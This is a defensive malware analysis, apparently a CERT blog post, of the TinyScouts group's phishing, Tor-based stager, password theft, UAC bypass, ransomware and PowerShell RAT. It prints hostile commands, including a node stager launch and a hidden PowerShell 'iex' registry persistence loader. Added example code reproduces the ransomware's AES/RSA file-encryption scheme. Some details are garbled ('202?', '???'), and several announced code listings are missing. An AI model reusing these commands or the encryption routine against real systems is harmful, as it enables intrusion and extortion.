Slightly more complicated than it seems: how the TinyScouts group attacks / Rostelecom-Solar company blog / Habr
Some time ago we began recording attempts to infect our customers' infrastructures with previously unknown malware. It was delivered to users through phishing emails, sometimes themed around the second wave of the coronavirus and sometimes clearly tailored to the targeted organization and its line of business. The attackers impersonated various real companies, for example Norilsk Nickel, the Russian Union of Industrialists and Entrepreneurs, Finauditservice and others.
Two aspects of the group's activity stood out: first, the attackers' high level of technical skill, and second, the variability of the attack scenario. If you are not interesting as a victim, they steal passwords and encrypt data; but if the machine sits in an interesting domain and offers potential for developing the attack further, they download a Remote Admin Tool (RAT) written in PowerShell. We named the group TinyScouts after function names found in the malicious code. In this article we describe its last two campaigns, which can be roughly divided by month, July and August 202?, and give a full analysis of the TinyScouts tools and scripts.
www.torproject.org/dist/torbrowser/???/tor-win32-???.5.zip
3) Stager 1: the script is launched using node.exe.
C:\Windows\System32\cmd.exe "/c if not exist hostname (node service ???[.]???)
Below is the deobfuscated Stager 1:
The service script receives the address of the control server as an argument and, when launched, creates a Tor hidden service (https://2019.www.torproject.org/docs/onion-services). Note that when the hidden service is started its name is generated; it looks like the name of an ordinary resource on the Tor network, for example vkss134jshs22yl3li2ul.onion. The script then sends the generated hidden service name to the attacker and starts a local web server. From then on the attacker communicates with the infected system in request/response mode through this web server (line 19 in the code): requests carry code to execute and responses carry the results.
This architecture gives the attacker access to the infected system even when it is behind NAT (the only requirement is Internet access) and removes the need to know the victim's public ("white") IP address. For defenders it also means the control server address never has to appear in the stager: the network artifact on the host is an outbound Tor connection, with the command traffic hidden inside it.
The first request to the newly started web server delivers the Decider script, whose task is to determine whether the computer is joined to a domain and to obtain the username. This time the checks for the presence of TeamViewer and RDP are missing:
After the results of the Decider script are sent to the attacker, the infected system receives a web request containing either the encryptor or the RAT, depending on the attacker's interest.
Common modules in both campaigns
Stager 3 script
The main script contains 5 components encoded in base64:
• the ransomware (Encryptor)
• a readme file with the attackers' message
• the WebBrowserPassView utility
• the Mail PassView utility
• an injector: an executable used to inject WebBrowserPassView and Mail PassView into an svchost process. Injection uses the usual RunPE method.
Stager 3 script functions:
1) Launching the ransomware (Get-Stuff function)
Below is a fragment of the script code that launches the ransomware:
2) Bypassing UAC (needed to remove shadow copies, which requires elevated privileges)
The code contains three techniques, all built on auto-elevating Windows binaries: cmstp.exe, CompMgmtLauncher.exe and fodhelper.exe. Each is a publicly documented UAC bypass.
3) Removing shadow copies
4) Launching WebBrowserPassView and Mail PassView
These are NirSoft utilities for extracting saved passwords from browsers and email clients respectively.
5) Sending the reports of these utilities to the control server
Before sending, the reports are encrypted with RC4 using a generated 4-character key:
The key itself is placed at the beginning of the message:
The readme message looks like this:
The ransomware is a .NET executable without any obfuscation. Files are encrypted with AES. A separate key and initialization vector are generated for each file; the pair is then encrypted with an RSA public key and stored inside the encrypted file. Since only the public key is embedded in the sample, the per-file keys cannot be recovered from the binary or the file itself; decryption requires the attackers' private key. The main function of the ransomware is shown below:
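As an added illustration of the scheme just described (this is example code written for this page, not the ransomware's .NET source): each file gets a fresh AES key and IV, the pair is wrapped with an RSA public key, and the wrapped blob is stored in the output next to the ciphertext. The post does not state the AES mode, the RSA padding or the container layout, so AES-CBC with PKCS7, RSA-OAEP and the four-byte marker plus length-prefixed header below are assumptions. The example needs the `cryptography` package.

```python
import os
import struct

from cryptography.hazmat.primitives import hashes, padding
from cryptography.hazmat.primitives.asymmetric import padding as asym_padding
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

MAGIC = b"TSEX"  # hypothetical container marker; the post does not describe the header

# RSA-OAEP is an assumption; the post only says "encrypted using the RSA public key"
OAEP = asym_padding.OAEP(
    mgf=asym_padding.MGF1(algorithm=hashes.SHA256()),
    algorithm=hashes.SHA256(),
    label=None,
)


def generate_keypair(bits=2048):
    """Attacker-side RSA pair. Only the public half would ship inside the sample."""
    private_key = rsa.generate_private_key(public_exponent=65537, key_size=bits)
    return private_key, private_key.public_key()


def encrypt_file_bytes(plaintext, public_key):
    """Per-file AES-256 key and IV, wrapped with RSA and stored in the header."""
    key, iv = os.urandom(32), os.urandom(16)
    padder = padding.PKCS7(128).padder()
    padded = padder.update(plaintext) + padder.finalize()
    enc = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
    body = enc.update(padded) + enc.finalize()
    wrapped = public_key.encrypt(key + iv, OAEP)
    # assumed layout: MAGIC | uint16 wrapped length | wrapped key+iv | AES-CBC body
    return MAGIC + struct.pack("<H", len(wrapped)) + wrapped + body


def parse_container(blob):
    """Split an encrypted file into the wrapped key material and the ciphertext body."""
    if blob[:4] != MAGIC:
        raise ValueError("not an encrypted container")
    (wlen,) = struct.unpack("<H", blob[4:6])
    wrapped, body = blob[6:6 + wlen], blob[6 + wlen:]
    if len(wrapped) != wlen or len(body) % 16:
        raise ValueError("truncated container")
    return wrapped, body


def decrypt_file_bytes(blob, private_key):
    """Recover the file; only the holder of the matching RSA private key can."""
    wrapped, body = parse_container(blob)
    key_iv = private_key.decrypt(wrapped, OAEP)  # ValueError on the wrong key
    key, iv = key_iv[:32], key_iv[32:]
    dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    padded = dec.update(body) + dec.finalize()
    unpadder = padding.PKCS7(128).unpadder()
    return unpadder.update(padded) + unpadder.finalize()


def wrong_key_is_rejected(blob, private_key):
    """True if decryption with this key fails, i.e. the key material stays sealed."""
    try:
        decrypt_file_bytes(blob, private_key)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    priv, pub = generate_keypair()
    sample = b"quarterly report, constructed sample content\n" * 40
    blob = encrypt_file_bytes(sample, pub)
    assert decrypt_file_bytes(blob, priv) == sample
    other_priv, _ = generate_keypair()
    print("wrong key rejected:", wrong_key_is_rejected(blob, other_priv))
    print(f"{len(sample)} plaintext bytes -> {len(blob)} container bytes")
```

The responder-relevant property is visible in `decrypt_file_bytes`: everything needed to decrypt is in the file except the RSA private key, and the sample carries only the public key, so neither the binary nor the encrypted files yield the AES keys.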
RAT script
This script has several layers of obfuscation. Once decrypted, it can execute the following commands:
• delete - self-removal
• exec - execute a PowerShell command
• download - download a file
• set_wait_time - change the polling interval for commands
• update_tiny - update the RAT
• run_module - execute a block of PowerShell commands
• add_persist_module - add a PowerShell module to the system that will be executed every time the RAT starts
• remote_persist_module - remove a module from the RAT startup list
The deobfuscated command processing function is shown below:
Two registry keys are used for persistence:
1) HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. The following command is placed in this key (the line is deobfuscated):
cmd /c PowerShell -windowstyle hidden -nop -c "iex (Get-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Windows -Name
2) HKCU\SOFTWARE\Microsoft\Windows. The script is stored here in a value whose name is client_id. Thus, at system start, the command from the Run key reads the script from this value and runs it.
client_id = AppX + base64(hostname + username + campaign_id)
The persistence function looks like this:
The decrypted script that is placed in Run:
Note that the RAT body itself is stored neither on disk nor in the registry: the registry holds only this loader, which downloads the malware afresh every time it runs.
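A hunting routine for this persistence, added here as an example in Python (it is neither the RAT's code nor the authors' tooling). It looks for the two artifacts above: a Run value that invokes PowerShell with iex over Get-ItemProperty, and a value under HKCU\SOFTWARE\Microsoft\Windows whose name is AppX followed by base64, which it decodes back into hostname, username and campaign id. The sample registry export is constructed; the "|" separator inside the base64 payload and the tail of the Run command after -Name are assumptions, since the post shows the command only up to that point.

```python
import base64
import binascii
import re
import sys

# Registry paths from the post, relative to HKCU
RUN_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
STORE_KEY = r"SOFTWARE\Microsoft\Windows"

# A Run command that feeds a registry value into iex; only the part up to -Name
# is shown in the post, the rest of the pattern is an assumption
IEX_LOADER = re.compile(
    r"iex\s*\(\s*Get-ItemProperty\b[^)]*?-Name\s+['\"]?(?P<name>[^\s'\")]+)",
    re.IGNORECASE,
)


def make_client_id(hostname, username, campaign_id, sep="|"):
    """Value name as described: 'AppX' + base64(hostname + username + campaign_id).
    The separator is an assumption; the post does not show one."""
    raw = sep.join((hostname, username, campaign_id)).encode()
    return "AppX" + base64.b64encode(raw).decode()


def decode_client_id(name, sep="|"):
    """Invert make_client_id; None for value names that are not of this form."""
    if not name.startswith("AppX") or len(name) <= 4:
        return None
    try:
        raw = base64.b64decode(name[4:], validate=True).decode()
    except (binascii.Error, UnicodeDecodeError):
        return None
    parts = raw.split(sep)
    if len(parts) != 3:
        return {"raw": raw}
    return dict(zip(("hostname", "username", "campaign_id"), parts))


def hunt(run_values, store_values):
    """Match Run entries to staged script values and decode the victim identity."""
    findings, seen = [], set()
    for run_name, command in run_values.items():
        m = IEX_LOADER.search(str(command))
        if not m:
            continue
        target = m.group("name")
        seen.add(target)
        findings.append({
            "run_value": run_name,
            "target_value": target,
            "script_present": target in store_values,
            "identity": decode_client_id(target),
        })
    # Orphaned AppX* values: loader left behind after the Run entry was cleaned up
    for name in store_values:
        if name not in seen and decode_client_id(name) is not None:
            findings.append({"run_value": None, "target_value": name,
                             "script_present": True, "identity": decode_client_id(name)})
    return findings


def collect_live():
    """Dump both keys from HKCU on a Windows host; winreg exists only there."""
    import winreg

    def dump(path):
        values, index = {}, 0
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path) as key:
            while True:
                try:
                    name, data, _ = winreg.EnumValue(key, index)
                except OSError:  # no more values
                    return values
                values[name] = data
                index += 1

    return dump(RUN_KEY), dump(STORE_KEY)


# Constructed sample export, not data from a real incident
CLIENT_ID = make_client_id("WS-ACCT-07", "j.smith", "campA")
SAMPLE_RUN = {
    "OneDrive": r'"C:\Users\j.smith\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "WinUpdateSvc": (
        'cmd /c PowerShell -windowstyle hidden -nop -c '
        f'"iex (Get-ItemProperty -Path HKCU:\\SOFTWARE\\Microsoft\\Windows -Name {CLIENT_ID}).{CLIENT_ID}"'
    ),
}
SAMPLE_STORE = {CLIENT_ID: "<obfuscated loader script>", "Theme": 1}

if __name__ == "__main__":
    live = sys.argv[1:] == ["--live"]
    run, store = collect_live() if live else (SAMPLE_RUN, SAMPLE_STORE)
    for finding in hunt(run, store):
        print(finding)
```

Run with `--live` on a Windows host to inspect the real keys. The decoded identity is worth keeping: the campaign id ties hosts to a wave, and the check for orphaned AppX values catches machines where the Run entry was removed but the loader value was not.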
The RAT can add PowerShell modules that run at every start. A separate registry key stores the module identifiers; during startup this key is checked and the malware requests all modules from the server by their identifiers.
When the malware starts, the Load-AllPersistModules function is called to load all added modules:
Module code, like the main body of the RAT, is likewise stored neither on disk nor in the registry.
Interaction with the server
The code contains a CampaignID constant, which is used as the encryption key when the RAT registers at startup (register-tiny function). The encryption algorithm is RC4. After the initial system information is sent, the server's response contains the encryption key that is used from then on with the same algorithm.
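The two RC4 usages on this page, report exfiltration with the 4-character key prepended to the ciphertext (Stager 3, function 5) and the registration exchange keyed by CampaignID (above), as one added Python example; it is not TinyScouts code. The key alphabet, the plaintext layouts, the FakeServer stand-in and the assumption that the server's reply is itself RC4-encrypted under CampaignID are mine.

```python
import secrets
import string

KEY_ALPHABET = string.ascii_letters + string.digits  # assumed alphabet for the 4-char key


def rc4(key, data):
    """Plain RC4 (key scheduling + keystream). Encrypt and decrypt are the same call."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


# --- Stager 3: password-tool reports, 4-char key placed at the start of the message ---

def seal_report(report, key=None):
    """Malware side: generate a 4-character key, prepend it, RC4 the report after it."""
    key = key or "".join(secrets.choice(KEY_ALPHABET) for _ in range(4)).encode()
    if len(key) != 4:
        raise ValueError("report key must be 4 bytes")
    return key + rc4(key, report)


def open_report(blob):
    """Analyst side: the key is the first four bytes, so no brute force is needed."""
    key, body = blob[:4], blob[4:]
    return key, rc4(key, body)


# --- RAT registration (register-tiny): first message keyed by CampaignID,
#     the reply carries the session key used for everything afterwards ---

class FakeServer:
    """Constructed stand-in for the control server, enough to show the key handover."""

    def __init__(self, campaign_id):
        self.campaign_id = campaign_id.encode()
        self.sessions = {}

    def register(self, blob):
        sysinfo = rc4(self.campaign_id, blob)
        session_key = secrets.token_bytes(16)
        self.sessions[sysinfo] = session_key
        # assumption: the reply is RC4-encrypted under CampaignID as well
        return rc4(self.campaign_id, session_key)


def client_register(server, campaign_id, sysinfo):
    """Send system info under CampaignID; return the session key the server issued."""
    reply = server.register(rc4(campaign_id.encode(), sysinfo))
    return rc4(campaign_id.encode(), reply)


if __name__ == "__main__":
    blob = seal_report(b"mail.example.test|user|Passw0rd")  # constructed report line
    print(blob[:4], open_report(blob)[1])
    server = FakeServer("CAMPAIGN-X")
    key = client_register(server, "CAMPAIGN-X", b"WS-ACCT-07|j.smith")
    print(rc4(key, rc4(key, b"exec whoami")))
```

Both constructions only defeat string matching on the wire. A report is recoverable from the capture alone because its key travels with it, and the registration is no better: CampaignID is a constant in the script, so a responder holding the sample and a capture of the first exchange recovers the session key and, with it, every later command and response.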
Indicators of Compromise:
https[://]late-salad-2839.yriqwzjskbbg.workers[.]dev/raw_stat/stat_launch.php
https[://]late-salad-2839.yriqwzjskbbg.workers[.]dev/raw_stat/stat_fin.php
https[://]late-salad-2839.yriqwzjskbbg.workers[.]dev/web/index.php?r=bag
Authors of the post:
Igor Zalevsky, Head of the Cyber Incident Investigation Department, JSOC CERT
Asker Jamirze, Technical Investigation Expert, JSOC CERT